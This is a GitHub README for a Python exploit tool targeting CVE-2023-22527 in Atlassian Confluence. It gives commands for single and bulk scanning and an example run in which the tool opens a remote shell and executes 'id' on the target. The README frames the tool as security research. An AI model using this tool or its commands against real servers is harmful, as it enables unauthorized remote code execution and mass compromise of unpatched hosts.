
Atlassian Confluence - Remote Code Execution

Primary LanguagePython

Atlassian Confluence CVE-2023-22527 Scanner 🛡️

Overview 🌟

This tool scans for the CVE-2023-22527 vulnerability in Atlassian Confluence, a critical RCE flaw allowing unauthorized remote code execution.

Features 🚀

  • Single URL Scan: Scan a specific target for the vulnerability.
  • Bulk Scan: Process multiple URLs from a file for efficient vulnerability assessment.
  • Concurrency Control: Utilize threading for faster bulk scanning.
  • Output Logging: Save vulnerable URLs to a specified file.

Usage 💻

  1. Single URL Scan: python exploit.py -u <URL>
  2. Bulk Scan: python exploit.py -f <file_path>
  3. Set Threads: python exploit.py -t <number_of_threads>
  4. Output File: python exploit.py -o <output_file_path>

Requirements 📋

  • Python 3.10+
  • Dependencies: requests, prompt_toolkit, rich, alive_progress

Installation 🛠️

  1. Clone the repository: git clone https://github.com/Chocapikk/CVE-2023-22527
  2. Install dependencies: pip install -r requirements.txt

Example 🔍

$ python3 exploit.py -u http://localhost:8092
[+] http://localhost:8092 is vulnerable - confluence
[!] Shell is ready, please type your commands UwU
$ id
uid=2002(confluence) gid=2002(confluence) groups=2002(confluence),0(root)
$ pwd
$ hostname

Disclaimer ⚠️

This tool is intended for security research and should only be used on systems with explicit authorization. Misuse may lead to legal consequences.

More Information 🔗

For more detailed information about the CVE-2023-22527 vulnerability, refer to the Project Discovery Blog Post.